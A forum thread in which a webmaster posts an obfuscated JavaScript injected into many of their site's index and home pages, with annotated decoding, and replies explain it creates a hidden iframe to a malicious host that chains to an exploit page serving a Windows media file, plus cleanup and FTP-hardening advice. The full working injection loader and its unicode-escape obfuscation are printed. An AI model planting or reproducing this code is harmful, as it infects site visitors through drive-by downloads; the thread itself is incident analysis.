This morning I discovered that a script has appeared in multiple locations on two of our websites.
Needless to say I'm recovering the sites from backups, changing our passwords and trawling the FTP logs. Are there any other actions I should take?
Here is the script. Any ideas what it might do?
<!-- C/C v0870 --><script>/* NOTE(review): this is the injected script exactly as found; only analysis comments have been added, the code is byte-identical. Every meaningful string is built from \u escapes plus X/H placeholder substitution, and almost every other statement is padding (unused locals, dates, globals). The leading HTML comment marker "C/C v0870" is a handy string to grep for across the rest of the site. */function fY(){};xN='';fY.prototype = {k : function() {p=7854;this.eS="";pT=false;/* k(): decodes to the string "http://beolinkonline.com/index.html", which is later used as the iframe src */return '\u0068\u0058\u0058\u0070\u003a\u002f\u002f\u0062\u0065\u006f\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0048\u0058\u006d\u006c'.replace(/X/g, 't').replace(/HHHHHHHHHHHHHHHHHHHHHH/g, 'linkonline.com/index.h');t="t";var uY="uY";var q=27591;var o=function(){return 'o'};},c : function() {/* c(): builds a hidden iframe pointing at the URL from k() and appends it to document.body; if that throws, writes an empty document and retries via setTimeout */var kB='';function wC(){};this.lQ="";var a=new Date(); var uA=false;function gR(){}; var b='replace';this.iA="";var m='';var w=document;var uT='';var bD="";var v=new Array();var mQ=function(){};var j=window;function kA(){};function aO(){};var f=24513;var hJ=new Date();var vH=new Date();fU=false;var qH=new Date();this.aI='';/* extends the native String prototype with a thin wrapper around String.prototype.replace; not called anywhere in the visible code */String.prototype.pZ=function(u,g){return this[b](u, g)};var mZ="mZ";var jI='';var n='';this.nW='';var gC=function(){return 'gC'};s="";/* e decodes to "setTimeout" */var e = '\u0073\u0058\u0058\u0058\u0048\u0048\u0048\u0048\u0075\u0074'.replace(/XXX/g, 'etH').replace(/HHHHH/g, 'Timeo');this.yO="yO";this.aJ="";/* h decodes to an empty page, "<html ><head ></head><body ></body></html>", written by the catch branch below */var h = '\u003c\u0068\u0074\u006d\u006c\u0020\u003e\u003c\u0068\u0065\u0061\u0064\u0020\u003e\u003c\u0048\u0048\u0065\u0061\u0064\u003e\u003c\u0062\u006f\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0058\u0064\u0079\u003e\u003c\u0048\u0048\u0074\u006d\u006c\u003e'.replace(/XXXXXXXX/g, 'dy ></bo').replace(/HH/g, '/h');this.fK="";this.d=false;var uC=function(){};aIB=63220;try {var tZ=false;var vN=function(){return 'vN'};bT="bT";var oX=6312;var lT=new Array();this.uP=false;var aV=28730;/* gJ decodes to "body" */var gJ = '\u0062\u0058\u0048\u0079'.replace(/X/g, 'o').replace(/H/g, 'd');var jY=function(){};this.jZC='';var hPC=new Date();/* z decodes to "style" */var z = '\u0073\u0058\u0058\u006c\u0065'.replace(/XX/g, 'HH').replace(/HH/g, 'ty');var pA=4555;var uM=new Array();var eZ=false;this.sT="";/* i decodes to "iframe" */var i = '\u0069\u0066\u0058\u0058\u0048\u0065'.replace(/XX/g, 'ra').replace(/H/g, 'm');this.lF=false;var dH='';/* wG decodes to "write" but is never used; the catch branch calls w.write directly */var wG = 
'\u0077\u0072\u0058\u0058\u0065'.replace(/XX/g, 'iH').replace(/H/g, 't');this.dI=false;hS='';var vF=false;jZCE=40515;/* l decodes to "createElement" */var l = '\u0063\u0072\u0065\u0061\u0074\u0065\u0058\u0058\u0058\u0058\u0048\u0048\u0074'.replace(/XXXX/g, 'Elem').replace(/HH/g, 'en');this.kDH="";var eO="eO";var zT=function(){};vS=12622;/* r decodes to "src" */var r = '\u0073\u0058\u0063'.replace(/X/g, 'H').replace(/H/g, 'r');bS=false;nWF=false;var dC="dC";var cU="";this.cX=false;var tE='';/* gV decodes to "setAttribute" */var gV = '\u0073\u0065\u0058\u0041\u0058\u0048\u0048\u0048\u0048\u0048\u0058\u0065'.replace(/X/g, 't').replace(/HHHHH/g, 'tribu');mM='';var tX='';var sS='';/* eI decodes to "hidden" */var eI = '\u0068\u0058\u0058\u0058\u0048\u006e'.replace(/XXX/g, 'idH').replace(/HH/g, 'de');function x(){};var jW=function(){return 'jW'};/* hP decodes to "visibility" */var hP = '\u0076\u0069\u0058\u0058\u0058\u0069\u006c\u0069\u0074\u0079'.replace(/XXX/g, 'HHb').replace(/HH/g, 'si');pM='';dL=""; /* jZ decodes to "appendChild" */var jZ = '\u0061\u0070\u0070\u0065\u006e\u0058\u0058\u0068\u0048\u006c\u0064'.replace(/XX/g, 'dC').replace(/H/g, 'i');function bO(){};var nU=false;this.iP=''; this.pN=51645;this.kS="kS"; /* eX = the decoded URL from k() */var eX=this.k();var nC="nC";this.dY='';this.dZ='';oH="";eP=61106;tN=54831;var gU=new Array();var yK=new Date();/* y = document.createElement("iframe") */var y=document[l](i);var nWFY=function(){return 'nWFY'};var bDB="bDB";oU=51980;var pH="";/* y.style.visibility = "hidden" - this is what makes the iframe invisible */y[z][hP] = eI;var jC=function(){};var rF=function(){};var fA='';/* y.setAttribute("src", eX) */y[gV](r, eX);var oI=false;tQ="tQ";hQ="";var nJ=function(){return 'nJ'};/* document.body.appendChild(y) - throws if document.body is not available yet, which lands in the catch branch */w[gJ][jZ](y);lR=13433;this.jD=false;var fKK="";cN="cN";wK="wK";sQ=false;var sE=18173;} catch(bM) {var iC='';var dQ=new Array();var gL=function(){return 'gL'};this.nH='';eIU='';/* fallback: document.write of the empty page decoded into h, presumably so that a body exists for the retry - confirm */w.write(h);var lN=false;function xI(){};this.jU="jU";fG="";var kD = this;bP=false;kL=50758;var uTT=new Array();qW=21507;var sB=new Array();this.gQ='';oD="oD";/* window.setTimeout(function(){ ... kD.c(); ... }, 124): retries c() on this same object after 124 ms */j[e](function(){ function hF(){};this.fQ=13986;rN='';oC='';fKY="fKY";var cZ=false;this.xF="";var eT='';kD.c();this.lL="lL";var jQ="";lG="";this.wL=12697;var tG=new Array();rC=false;this.mP="";var tGE="tGE";}, 124);var xD=false;var sL=false;var qS=new Array();}var cP="";var 
rE=function(){return 'rE'};rM="rM";this.mO="mO";}};var wR=function(){return 'wR'};/* entry point: instantiate and run c() immediately at page load */var hO=new fY(); var uW=function(){return 'uW'};hO.c();var hK=12219;</script>
More than 20 files, all with either the name 'index.' or 'home.' were modified. The FTP log shows which files were downloaded and uploaded again, so I don't think it was through a form exploit.
This creates an invisible iframe:
beolinkonline.com contains another iframe from http://smasmaild.com/kilovork/index.php?468f4ff003bdcff4c1c6b9ef06f2c100
It attempts to run a Windows media file (.asx).
Looks like a type of buffer overflow to me...
Where and how was it injected? You're not sanitizing users' posts/uploads?
You should read up on the MySpace hack of 2005.
http://namb.la/popular/
It will give you an idea of how you can easily be hack'd :D
You could consider changing both the FTP username and password. You can also restrict FTP connections to certain IP addresses/domains so that the FTP service is accessible only from select locations.